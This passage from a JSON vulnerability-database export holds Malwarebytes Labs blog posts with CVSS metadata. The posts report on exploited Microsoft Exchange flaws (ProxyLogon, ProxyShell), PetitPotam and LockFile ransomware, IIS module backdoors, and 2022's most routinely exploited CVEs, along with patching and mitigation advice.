[AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). 
Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVEs (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. 
The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring, you say? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for all 4 CVEs, we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. 
Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by "restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access", although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Volexity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation and the vulnerabilities, and also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. 
They called it [ProxyLogon](<https://proxylogon.com/>) because the bug exploits the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. The US Cybersecurity & Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on compromised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). 
You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft's efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that's deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. \n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). 
\n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent 
warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. 
This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given that the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>), although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full-blown network-wide ransomware infection we ought to tell you more about PetitPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. 
MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. 
This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! 
Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. 
As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. 
Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prices and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. 
A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several things you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T00:28:46", "description": "The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners have released a joint Cybersecurity Advisory (CSA) called the [2022 Top Routinely Exploited Vulnerabilities](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>).\n\nWe went over the list and it felt like a bad trip down memory lane. If you adhere to the expression \"those who ignore history are doomed to repeat it\" then you may consider the list as a valuable resource that you can derive lessons from. Unfortunately as George Bernard Shaw said:\n\n> \"We learn from history that we learn nothing from history.\"\n\nBut since that's a self-contradicting expression, let's assume there are lessons to be learned.\n\n## Last year's top vulnerabilities\n\nFirst let me show you the bad memories. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. 
We will use the CVE codes to uniquely identify the covered vulnerabilities.\n\n * [CVE-2021-40539](<https://vulners.com/cve/CVE-2021-40539>) is a REST API authentication bypass vulnerability in [ManageEngine's single sign-on (SSO) solution](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) which results in remote code execution (RCE). When word of this vulnerability came out it was already clear that it was being exploited in the wild. Noteworthy is that this vulnerability also made it into the [top 5 routinely exploited vulnerabilities of 2021](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>).\n * [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), aka [Log4Shell](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>), is a vulnerability in Apache's Log4j library, an open-source logging framework incorporated into thousands of other products. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest throughout the first half of 2022.\n * [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>) is a vulnerability affecting Fortinet SSL VPNs, which was also routinely exploited in 2020 and 2021.\n * [ProxyShell](<https://www.malwarebytes.com/blog/news/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities>) is a combination of three vulnerabilities in Microsoft Exchange Server ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>), [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>), and [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. 
ProxyShell also made it into the top 5 routinely exploited vulnerabilities of 2021.\n * [CVE-2021-26084](<https://vulners.com/cve/CVE-2021-26084>) is a vulnerability affecting Atlassian Confluence Server and Data Center which could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof-of-concept (PoC) was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021 and also made it into the top 5 routinely exploited vulnerabilities of 2021.\n\nLooking at the above, it looks like Shaw was at least partly right. We are not learning from history. It also indicates that we should be able to predict some of the vulnerabilities that will show up in next year's list. Let's take a stab at that. So we're looking for easy to overlook and/or hard to patch vulnerabilities in the 2022 list that we haven't already covered above.\n\n## This year's top vulnerabilities?\n\nThese are the ones that I think will make it to the top 10 next year, maybe together with the ones that have already been around for years.\n\n * [CVE-2022-22954](<https://vulners.com/cve/CVE-2022-22954>), [CVE-2022-22960](<https://vulners.com/cve/CVE-2022-22960>) are two vulnerabilities that can be chained to allow Remote Code Execution (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. Exploitation of these [VMware vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns>) began in early 2022 and attempts continued throughout the remainder of the year.\n * [CVE-2022-26134](<https://vulners.com/cve/CVE-2022-26134>) is a critical RCE vulnerability that affects Atlassian Confluence and Data Center. 
The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (see CVE-2021-26084 above), which cyber actors also exploited in 2022.\n * [CVE-2022-1388](<https://vulners.com/cve/CVE-2022-1388>) is a vulnerability in the F5 [BIG IP platform](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>) that allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n * [CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>), aka [Follina](<https://www.malwarebytes.com/blog/news/2022/06/faq-mitigating-microsoft-offices-follina-zero-day>), is a Microsoft Windows Support Diagnostic Tool RCE vulnerability. An attacker can send you a malicious Office document that will compromise your machine with malware when you open it.\n\nSo I was hoping we can strike a deal. I'll check next year how well this prediction does and you all patch these vulnerabilities real quick, so I can write about some new ones next year.\n\n* * *\n\n**We don't just report on vulnerabilities--we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. 
Keep vulnerabilities in tow by using [Malwarebytes Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-07T18:30:00", "type": "malwarebytes", "title": "2022's most routinely exploited vulnerabilities\u2014history repeats", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": 